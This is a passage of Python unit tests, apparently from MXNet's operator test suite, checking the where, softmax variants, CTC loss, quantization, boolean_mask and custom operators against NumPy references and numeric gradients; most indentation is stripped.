grad_req='write')
# test forward req='write'
outputs = where_exe_write.forward(is_train=True, condition=condition_np,
x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='write'
where_exe_write.backward(grad_in_mx.astype('float32'))
assert same(where_exe_write.grad_dict['x'].asnumpy(), grad_expected_x)
assert same(where_exe_write.grad_dict['y'].asnumpy(), grad_expected_y)
assert same(where_exe_write.grad_dict['condition'].asnumpy(), grad_expected_cond)
# test req='add'
x_grad_init = np.random.randint(30, 40, np.prod(shape)).reshape(shape)
y_grad_init = np.random.randint(40, 50, np.prod(shape)).reshape(shape)
where_exe_add = where_sym._simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='add')
where_exe_add.grad_dict['x'][:] = x_grad_init
where_exe_add.grad_dict['y'][:] = y_grad_init
# test forward req='add'
outputs = where_exe_add.forward(is_train=True, condition=condition_np, x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='add'
where_exe_add.backward(grad_in_mx.astype('float32'))
x_ograd = where_exe_add.grad_dict['x'].asnumpy()
y_ograd = where_exe_add.grad_dict['y'].asnumpy()
assert same(x_ograd, grad_expected_x+x_grad_init)
assert same(y_ograd, grad_expected_y+y_grad_init)
def test_where_numeric_gradient(shape, same_shape):
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
check_numeric_gradient(where_sym, [condition_np, x_np, y_np], grad_nodes=['x', 'y'])
def test_invalid_shape():
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
assert_exception(lambda: where_sym.eval(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
assert_exception(lambda: mx.nd.where(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
def test_1d_cond():
cond = mx.nd.array([1, 0, 1])
x = mx.nd.array([[2, 3], [4, 5], [6, 7]])
y = mx.nd.array([[7, 8], [9, 10], [10, 11]])
expect_out = np.array([[2, 3], [9, 10], [6, 7]])
out = mx.nd.where(cond, x, y).asnumpy()
        assert (expect_out == out).all()
test_where_helper((5, 9), True)
test_where_helper((5, 9), False)
test_where_helper((5, 7, 9), True)
test_where_helper((5, 7, 9), False)
test_where_helper((10, 8, 15, 3), True)
test_where_helper((10, 8, 15, 3), False)
test_where_numeric_gradient((5, 9), True)
test_where_numeric_gradient((5, 9), False)
test_where_numeric_gradient((5, 7, 9), True)
test_where_numeric_gradient((5, 7, 9), False)
test_invalid_shape()
test_1d_cond()
def test_softmin():
for ndim in range(1, 5):
for dtype in [np.float16, np.float32, np.float64]:
rtol, atol = (1e-2, 5e-3) if dtype is np.float16 else (1e-3, 1e-3)
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape).astype(dtype)
data = data / 10 if dtype is np.float16 else data
sym = mx.sym.softmin(axis=axis)
expected_fwd = np_softmax(-data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], atol=atol, dtype=dtype)
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=rtol, atol=atol, grad_req=req, dtype=dtype)
if dtype is not np.float16:
check_numeric_gradient(sym, [data], rtol=rtol, atol=atol, dtype=dtype)
def test_new_softmax():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.softmax(axis=axis)
expected_fwd = np_softmax(data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd])
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=1e-2, atol=1e-3, grad_req=req)
check_numeric_gradient(sym, [data], rtol=1e-2, atol=1e-3)
def test_softmax_with_temperature():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
data = np.random.uniform(-2, 2, size=shape)
for temp in range(1, 11):
sym = mx.sym.softmax(axis=0, temperature=temp)
expected_fwd = np_softmax(data, axis=0, temperature=temp)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], rtol=0.05, atol=1e-3)
check_symbolic_backward(sym, [data], [np.ones(shape)], [expected_bwd], rtol=0.05, atol=1e-3)
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
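# Illustrative sketch (not part of the original test suite): softmax with a
# temperature T divides the max-shifted logits by T before exponentiating, so a
# larger T flattens the distribution. Assuming np_softmax implements the usual
# definition, this is what the forward check above expects.
def _softmax_temperature_sketch(temperature=2.0):
    x = np.array([1.0, 2.0, 3.0])
    z = np.exp((x - x.max()) / temperature)  # subtract the max for numerical stability
    return z / z.sum()                       # sums to 1, flatter than plain softmax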
def test_log_softmax():
for ndim in range(1, 5):
for _ in range(5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(0, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.log_softmax(axis=axis-ndim)
check_symbolic_forward(sym, [data], [np.log(np_softmax(data, axis=axis)+1e-20)], rtol=1e-3, atol=1e-4)
check_numeric_gradient(sym, [data], rtol=1e-1, atol=1e-2)
def test_softmax_with_large_inputs():
def softmax_forward(input_data, true_output):
data = mx.sym.Variable('data')
out1 = data.softmax(axis=1)
exec1 = out1._bind(default_context(), args={'data': input_data})
exec1.forward()[0].wait_to_read()
ndarr = exec1.outputs[0][0][0][0]
assert_almost_equal(ndarr, true_output, rtol=1e-5, atol=1e-5)
softmax_forward(mx.nd.array([[[[-1e30,-1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[1e30,1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[-3.4e38,-3.4e38]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[3.4e38,3.4e38]]]]), np.array([1.0,1.0]))
@with_environment('MXNET_SAFE_ACCUMULATION', '1')
def test_softmax_dtype():
def check_dtypes_almost_equal(op_name,
atol, rtol,
grad_atol, grad_rtol,
idtype, ref_dtype, odtype=None):
op = getattr(mx.nd, op_name)
input_data = mx.random.uniform(shape=(100, 500))
dtype_input = input_data.astype(idtype)
ref_input = input_data.astype(ref_dtype)
dtype_input.attach_grad()
ref_input.attach_grad()
with mx.autograd.record():
dtype_softmax = op(dtype_input, axis=-1, dtype=odtype)
ref_softmax = op(ref_input, axis=-1, dtype=odtype)
assert_almost_equal(dtype_softmax, ref_softmax, rtol=rtol, atol=atol)
dtype_softmax.backward()
ref_softmax.backward()
assert_almost_equal(dtype_input.grad, ref_input.grad, rtol=grad_rtol, atol=grad_atol)
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64', 'float64')
def test_softmax_with_length():
def np_softmax_with_length(data, length):
res = np.zeros(data.shape)
for i in range(length.shape[0]):
for j in range(length.shape[1]):
leng = int(length[i, j])
res[i, 0:leng, j] = np_softmax(data[i, 0:leng, j])
return res
ndim = 3
shape = rand_shape_nd(ndim, dim=10)
len_shape = list(shape)
del len_shape[1]
len_shape = tuple(len_shape)
for dtype in [np.float16, np.float32, np.float64]:
mx_data = rand_ndarray(shape, dtype=dtype)
np_data = mx_data.asnumpy()
np_length = np.random.randint(1, shape[1] + 1, len_shape)
mx_length = mx.nd.array(np_length, dtype=np.int32)
np_out = np_softmax_with_length(np_data, np_length)
data = mx.sym.Variable("data")
length = mx.sym.Variable("length")
mx_sym = mx.sym.softmax(data=data, length=length, use_length=True, axis=1)
location = {"data": mx_data, "length": mx_length}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out], rtol=rtol, atol=atol, dtype="asnumpy")
check_symbolic_backward(mx_sym, location, [np.ones(shape, dtype=dtype)],
[np.zeros(shape), np.zeros(len_shape, dtype=np.int32)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3, dtype="asnumpy")
def test_pick():
def test_pick_helper(index_type=np.int32):
for mode in ['clip', 'wrap']:
ndim = np.random.randint(1, 5)
bshape = np.random.randint(1, 10, size=ndim)
axis = np.random.randint(0, ndim)
sshape = bshape.copy()
sshape[axis] = 1
data = np.random.uniform(-1, 1, size=bshape)
if mode == 'wrap':
index = np.random.randint(-2*bshape[axis], 2*bshape[axis], size=sshape)
else:
index = np.random.randint(0, bshape[axis], size=sshape)
exp = []
for i in range(ndim):
if i == axis:
if mode == 'wrap':
exp.append(index % bshape[axis])
else:
exp.append(index)
else:
ishape = [1 for _ in range(ndim)]
ishape[i] = bshape[i]
exp.append(np.arange(bshape[i]).reshape(ishape))
expected = data[exp]
data = mx.nd.array(data, dtype='float32')
index = mx.nd.array(index, dtype=index_type)
out = mx.nd.pick(data, index, axis=axis, keepdims=True, mode=mode)
assert_almost_equal(out.asnumpy(), expected)
data_holder = data
index_holder = index
data = mx.sym.Variable('data')
index = mx.sym.Variable('index')
sym = mx.sym.pick(data, index, axis=axis, keepdims=True, mode=mode)
check_numeric_gradient(sym, [data_holder, index_holder], grad_nodes=['data'])
test_pick_helper(np.int32)
test_pick_helper(np.float32)
def check_ctc_loss(acts, labels, loss_truth, contrib=False):
in_var = mx.sym.Variable('input')
labels_var = mx.sym.Variable('labels')
if contrib:
ctc = mx.sym.contrib.ctc_loss(in_var, labels_var)
else:
ctc = mx.sym.ctc_loss(in_var, labels_var)
acts_nd = mx.nd.array(acts, ctx=default_context())
labels_nd = mx.nd.array(labels, ctx=default_context())
exe = ctc._bind(ctx=default_context(), args=[acts_nd, labels_nd])
    # forward with gradient calculation enabled (is_train=True)
    exe.forward(is_train=True)
    out_train = exe.outputs[0].copy()
    # forward with gradient calculation disabled (is_train=False)
    exe.forward(is_train=False)
    out_infer = exe.outputs[0]
    # losses computed in the two modes must match
    assert_almost_equal(out_train, out_infer)
    # test against ground truth, if available
    if loss_truth is not None:
        assert_almost_equal(out_train, loss_truth)
# test grad
check_numeric_gradient(ctc, [acts, labels], grad_nodes=['input'], rtol=0.05, atol=1e-3)
def test_ctc_loss():
# Test 1: check that batches are same + check against Torch WarpCTC
acts = np.array([
[[1.2, 3.4, 1.2, -0.1, -2.34], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[0.1, 0.2, 0.3, 0.22, 0.123], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14, -13, -12, -11]]],
dtype=np.float32)
labels = np.array([[2, 3, 0], [2, 3, 0]])
true_loss = np.array([4.04789, 4.04789], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts, labels, true_loss, contrib=contrib)
# Test 2:
acts2 = np.array([
[[-5, -4, -3, -2, -1], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[-10, -9, -8, -7, -6], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14.2, -13.5, -12.2, -11.22]]], dtype=np.float32)
labels2 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.float32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels2, true_loss, contrib=contrib)
# Test 3: check use integer type as label
labels3 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.int32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels3, true_loss, contrib=contrib)
def test_ctc_loss_with_large_classes():
ctx = default_context()
num_classes = 6000
seq_len = 8
batch_size = 2
data = np.empty((num_classes, 0))
    for i in range(seq_len * batch_size):
row = np.roll(np.arange(num_classes, dtype=np.float32), i).reshape(num_classes, 1)
data = np.append(data, row/13, axis=1)
data = data.reshape(seq_len, batch_size, num_classes)
label = np.array([
[100, 200, 300, 400, 500, 0, 0, 0],
[1000, 2000, 3000, 4000, 0, 5000, 0, 0]], dtype=np.int32)
nd_data = mx.nd.array(data)
nd_label = mx.nd.array(label)
loss = mx.nd.ctc_loss(data=nd_data, label=nd_label)
expected_loss = np.array([688.02826, 145.34462])
assert_almost_equal(loss, expected_loss)
def test_ctc_loss_grad():
def check_ctc_loss_grad(blank_label, contrib=False): # from tf
vocab_size = 5
max_label_len = 5
        padding_mask = -1 + (blank_label == 'first')
targets_0 = [0, 1, 2, 1, 0]
loss_log_prob_0 = -3.34211
input_prob_matrix_0 = np.asarray(
[[0.633766, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, 0.588392, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, 0.321418, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, 0.643849, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[0.458235, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
gradient_log_prob_0 = np.asarray(
[[-0.366234, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, -0.411608, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, -0.678582, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, -0.356151, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[-0.541765, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
targets_1 = [0, 1, 1, 0]
loss_log_prob_1 = -5.42262
input_prob_matrix_1 = np.asarray(
[[0.30176, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, 0.397533, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, 0.202456],
[0.280884, 0.429522, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[0.423286, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
gradient_log_prob_1 = np.asarray(
[[-0.69824, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, -0.602467, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, -0.797544],
[0.280884, -0.570478, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[-0.576714, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
inputs = [
np.vstack(
[input_prob_matrix_0[t, :], input_prob_matrix_1[t, :]])
for t in range(5)
] + 2 * [np.nan * np.ones((2, vocab_size+1), np.float32)]
inputs = np.log(np.asarray(inputs, dtype=np.float32))
grad_truth = np.array([
np.vstack(
[gradient_log_prob_0[t, :], gradient_log_prob_1[t, :]])
for t in range(5)
] + 2 * [np.zeros((2, vocab_size+1), np.float32)])
if blank_label == 'first':
inputs = np.roll(inputs, 1, axis=2)
grad_truth = np.roll(grad_truth, 1, axis=2)
labels = (np.asarray([x + [padding_mask]*(max_label_len-len(x))
for x in [targets_0, targets_1]])+(blank_label == 'first'))
seq_lens = np.array([5, 5], dtype=np.int32)
label_lens = np.array([5, 4], dtype=np.int32)
loss_truth = np.array([-loss_log_prob_0, -loss_log_prob_1], np.float32)
with default_context():
data = mx.nd.array(inputs)
label = mx.nd.array(labels)
data.attach_grad()
with mx.autograd.record():
if contrib:
l = mx.contrib.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
else:
l = mx.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
l.backward()
assert_almost_equal(l, loss_truth, atol=1e-5, rtol=1e-5)
assert_almost_equal(data.grad, grad_truth, atol=1e-5, rtol=1e-5)
for contrib in [False, True]:
for label in ['first', 'last']:
check_ctc_loss_grad(label, contrib=contrib)
def test_quantization_op():
min0 = mx.nd.array([0.0])
max0 = mx.nd.array([1.0])
a = mx.nd.array([[0.1392, 0.5928], [0.6027, 0.8579]])
qa, min1, max1 = mx.nd.contrib.quantize(a, min0, max0, out_type='int8')
a_ = mx.nd.contrib.dequantize(qa, min1, max1, out_type='float32')
qa_real = mx.nd.array([[18, 75], [77, 109]])
a_real = mx.nd.array([[0.14173228, 0.5905512], [0.6062992, 0.8582677]])
print(a_.asnumpy())
print(a_real.asnumpy())
assert same(qa.asnumpy(), qa_real.asnumpy())
assert_almost_equal(a_.asnumpy(), a_real.asnumpy(), rtol=1e-2)
def test_index_copy():
x = mx.nd.zeros((5,3))
t = mx.nd.array([[1,2,3],[4,5,6],[7,8,9]])
index = mx.nd.array([0,4,2], dtype=np.int64)
tensor = mx.nd.array([[1,2,3],[0,0,0],[7,8,9],[0,0,0],[4,5,6]])
x_grad = mx.nd.array([[0,0,0],[1,1,1],[0,0,0],[1,1,1],[0,0,0]])
t_grad = mx.nd.array([[1,1,1],[1,1,1],[1,1,1]])
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
x.attach_grad()
t.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.index_copy(x, index, t)
out.backward()
assert same(out.asnumpy(), tensor.asnumpy())
assert same(x.grad.asnumpy(), x_grad.asnumpy())
assert same(t.grad.asnumpy(), t_grad.asnumpy())
def test_boolean_mask():
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 1, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.array([[4, 5, 6]])
expected_grad = np.array([[0, 0, 0], [1, 1, 1], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
# test 0-size output
mx.set_np_shape(True)
data = mx.nd.array([[1, 2, 3],[4, 5, 6],[7, 8, 9]])
index = mx.nd.array([0, 0, 0])
data.attach_grad()
with mx.autograd.record():
out = mx.nd.contrib.boolean_mask(data, index)
out.backward()
data.grad.wait_to_read()
expected = np.zeros((0, 3))
expected_grad = np.array([[0, 0, 0], [0, 0, 0], [0, 0, 0]])
assert same(out.asnumpy(), expected)
assert same(data.grad.asnumpy(), expected_grad)
mx.set_np_shape(False)
# test gradient
shape = (100, 30)
a = mx.nd.random.randint(0, 100, shape=shape)
a.attach_grad()
bi = mx.nd.random.randint(0, 100, shape=shape[0:1]) > 50
ci = mx.nd.random.randint(0, 100, shape=shape[0:1]) < 50
mx_grad = mx.nd.zeros_like(a)
mx.autograd.mark_variables([a], [mx_grad], grad_reqs='add')
T = 3
for _ in range(T):
with mx.autograd.record():
b = mx.nd.contrib.boolean_mask(a, bi)
c = mx.nd.contrib.boolean_mask(a, ci)
su = b.sum() + c.sum()
su.backward()
grad = (bi + ci).asnumpy().reshape((-1,) + (1,) * (len(shape)-1))
grad = np.tile(grad, (1,) + shape[1:])
# T times
grad *= T
assert_allclose(a.grad.asnumpy(), grad)
a_np = a.asnumpy()
assert same(b.asnumpy(), a_np[bi.asnumpy().astype('bool')])
assert same(c.asnumpy(), a_np[ci.asnumpy().astype('bool')])
def test_div_sqrt_dim():
data_tmp = np.random.normal(0, 1, (5, 10, 8))
data = mx.symbol.Variable('data')
test = mx.sym.contrib.div_sqrt_dim(data)
check_numeric_gradient(test, [data_tmp], numeric_eps=1E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp / np.sqrt(data_tmp.shape[-1])])
# helper function to identify inputs likely to fail check_numeric_gradient's tolerance test
# due to finite difference method inaccuracies or function discontinuities at the origin
def bad_input_finder(f, f_grad, dtype):
eps = default_numeric_eps()[np.dtype(dtype)]
rtol = default_rtols()[np.dtype(dtype)]
def expected_relative_error(x):
fd_gradient = (f(x+eps/2) - f(x-eps/2)) / eps
return abs(fd_gradient/f_grad(x) - 1)
def is_fd_problem_input(x):
return abs(x) < eps/2 or expected_relative_error(x) > rtol
return np.vectorize(is_fd_problem_input)
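# Illustrative sketch (not part of the original test suite): bad_input_finder flags
# points where the central difference (f(x + eps/2) - f(x - eps/2)) / eps is a poor
# estimate of f'(x), e.g. 1/x evaluated too close to the origin.
def _central_difference_sketch(x=0.5, eps=1e-4):
    finite_diff = (np.reciprocal(x + eps / 2) - np.reciprocal(x - eps / 2)) / eps
    analytic = -np.reciprocal(x) ** 2
    return abs(finite_diff / analytic - 1)  # small relative error away from x = 0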
def test_reciprocal_op():
data_tmp = np.random.rand(3, 4).astype(np.float32) * 10 - 5
# Avoid possible division by 0 errors and finite difference method
# inaccuracies by replacing problem inputs with 1.0.
is_bad_input = bad_input_finder(np.reciprocal,
lambda x: -np.reciprocal(x)**2, np.float32)
data_tmp[is_bad_input(data_tmp)] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.reciprocal(data)
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [np.reciprocal(data_tmp)])
def test_cbrt_op():
data_tmp = np.random.rand(3, 4).astype(np.float32) * 10 - 5
# Avoid possible division by 0 errors and finite difference method
# inaccuracies by replacing problem inputs with 1.0.
is_bad_input = bad_input_finder(np.cbrt,
lambda x: 1./(3 * np.cbrt(x)**2), np.float32)
data_tmp[is_bad_input(data_tmp)] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.cbrt(data)
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [np.cbrt(data_tmp)])
def test_rcbrt_op():
data_tmp = np.random.rand(3, 4).astype(np.float32) * 10 - 5
# Avoid possible division by 0 errors and finite difference method
# inaccuracies by replacing problem inputs with 1.0.
is_bad_input = bad_input_finder(lambda x: 1./np.cbrt(x),
lambda x: -1./(3 * np.cbrt(x)**4), np.float32)
data_tmp[is_bad_input(data_tmp)] = 1.0
data = mx.symbol.Variable('data')
test = mx.sym.rcbrt(data)
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [1/np.cbrt(data_tmp)])
def test_custom_op():
class Sqr(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
if in_data[0].stype == 'default':
aux[0][:] = 1
self.assign(out_data[0], req[0], in_data[0]*in_data[0])
else:
inp = in_data[0]
csr_m = inp.data * inp.data
out = mx.nd.sparse.csr_matrix((csr_m, inp.indices, inp.indptr), shape=inp.shape)
self.assign(out_data[0], req[0], out)
if (in_data[0].stype == 'csr'):
assert(isinstance(out_data[0], mx.nd.sparse.CSRNDArray))
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], 2 * mx.nd.sparse.elemwise_mul(in_data[0], out_grad[0]))
if in_data[0].stype == 'default':
assert (aux[0].asnumpy() == 1).all()
@mx.operator.register("sqr")
class SqrProp(mx.operator.CustomOpProp):
def __init__(self):
super(SqrProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['data']
def list_outputs(self):
return ['output']
def list_auxiliary_states(self):
return ['aux']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], [in_shape[0]]
def infer_type(self, in_type):
return in_type, [in_type[0]], [in_type[0]]
def infer_storage_type(self, in_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default']
return ['csr'], ['csr'], ['csr']
def infer_storage_type_backward(self, ograd_stype, in_stype,
out_stype, igrad_stype, aux_stype):
if in_stype[0] == 'default':
return ['default'], ['default'], ['default'], ['default'], ['default']
return ['default'], ['csr'], ['csr'], ['csr'], ['csr']
def create_operator(self, ctx, shapes, dtypes):
return Sqr()
data = mx.symbol.Variable('data')
aux = mx.symbol.Variable('aux')
op = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.cast(data, dtype='float64')
op = mx.symbol.cast(op, dtype='float32')
check_numeric_gradient(op, [x], [aux])
data = mx.symbol.Variable('data', stype='csr')
aux = mx.symbol.Variable('aux')
op2 = mx.symbol.Custom(data=data, aux=aux, name='sqr', op_type='sqr')
x = x.tostype('csr')
aux = mx.nd.zeros_like(x)
check_numeric_gradient(op2, [x], [aux], grad_stype_dict={"data": "csr"})
x2 = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
x2 = x2.tostype('csr')
aux2 = mx.nd.zeros_like(x2)
x2.attach_grad()
with mx.autograd.record():
output = mx.nd.Custom(x2, aux2, name='sqr', op_type='sqr')
output.backward()
expected_output = mx.nd.sparse.square(x2)
expected_grad = 2 * x2
rtol = 1e-4
atol = 1e-6
assert_almost_equal(output, expected_output, rtol=rtol, atol=atol)
assert_almost_equal(x2.grad, expected_grad, rtol=rtol, atol=atol)
# test for backward compatibility, i.e. the correctness of default implementation of
# infer storage in custom operator
class Mult(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult")
class MultProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultProp, self).__init__(need_top_grad=True)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return Mult()
lhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
rhs = mx.nd.array(np.random.uniform(-1, 1, size=(4, 10)))
lhs.attach_grad()
rhs.attach_grad()
with mx.autograd.record():
y = mx.nd.Custom(lhs, rhs, name='mult', op_type='mult')
y.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class MultNoGrad(mx.operator.CustomOp):
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], in_data[0]*in_data[1])
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
self.assign(in_grad[0], req[0], in_data[1])
self.assign(in_grad[1], req[1], in_data[0])
@mx.operator.register("mult_no_grad")
class MultNoGradProp(mx.operator.CustomOpProp):
def __init__(self):
super(MultNoGradProp, self).__init__(need_top_grad=False)
def list_arguments(self):
return ['lhs', 'rhs']
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return in_shape, [in_shape[0]], []
def create_operator(self, ctx, shapes, dtypes):
return MultNoGrad()
def infer_storage_type_backward(self, ograd_stype, in_stype, out_stype, igrad_stype, aux_stype):
return ograd_stype, in_stype, out_stype, igrad_stype, aux_stype
with mx.autograd.record():
y2 = mx.nd.Custom(lhs, rhs, name="mult_no_grad", op_type="mult_no_grad")
y2.backward()
assert_almost_equal(rhs, lhs.grad, rtol=rtol, atol=atol)
assert_almost_equal(lhs, rhs.grad, rtol=rtol, atol=atol)
class NoInputOp(mx.operator.CustomOp):
def __init__(self, length, depth):
super(NoInputOp, self).__init__()
self.output = np.ones(shape=(length, depth), dtype=np.float32)
def forward(self, is_train, req, in_data, out_data, aux):
self.assign(out_data[0], req[0], self.output)
def backward(self, req, out_grad, in_data, out_data, in_grad, aux):
pass
@mx.operator.register("no_input_op")
class NoInputOpProp(mx.operator.CustomOpProp):
def __init__(self, length, depth):
super(NoInputOpProp, self).__init__()
self.length = int(length)
self.depth = int(depth)
def list_arguments(self):
return []
def list_outputs(self):
return ['output']
def infer_shape(self, in_shape):
return [], [(self.length, self.depth)], []
def infer_type(self, in_type):
return [], [np.float32], []
def create_operator(self, ctx, shapes, dtypes):
return NoInputOp(length=self.length, depth=self.depth)
with mx.autograd.record():
x = mx.nd.Custom(length=10, depth=10, op_type="no_input_op")
assert_almost_equal(x, np.ones(shape=(10, 10), dtype=np.float32))
